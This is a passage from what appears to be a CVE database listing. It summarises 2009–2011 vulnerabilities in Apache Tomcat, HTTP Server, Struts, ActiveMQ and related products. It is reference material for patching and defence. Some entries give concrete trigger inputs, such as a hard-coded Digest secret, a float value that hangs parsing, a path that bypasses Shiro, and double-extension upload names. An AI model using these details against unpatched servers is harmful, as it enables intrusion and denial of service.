13418| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
13419| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
13420| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
13421| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
13422| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
13423| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
13424| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
13425| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
13426| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
13427| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
13428| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
13429| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
13430| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
13431| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
13432| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
13433| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
13434| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
13435| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
13436| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
13437| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
13438| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
13439| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
13440| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
13441| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
13442| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
13443| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
13444| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
13445| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
13446| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
13447| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
13448| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
13449| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
13450| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
13451| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
13452| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
13453| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
13454| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
13455| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
13456| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
13457| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
13458| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
13459| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
13460| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
13461| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
13462| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
13463| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
13464| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
13465| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
13466| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
13467| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13468| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
13469| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
13470| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
13471| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
13472| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
13473| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
13474| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
13475| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
13476| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
13477| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
13478| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
13479| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
13480| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
13481| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
13482| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
13483| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13484| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
13485| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
13486| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
13487| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
13488| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
13489| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
13490| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
13491| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
13492| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
13493| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
13494| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
13495| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
13496| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
13497| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
13498| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
13499| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
13500| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
13501| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
13502| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
13503| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
13504| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
13505| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
13506| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
13507| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
13508| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
13509| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
13510| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
13511| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
13512| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
13513| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
13514| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
13515| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
13516| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
13517| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
13518| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
13519| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
13520| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
13521| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
13522| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
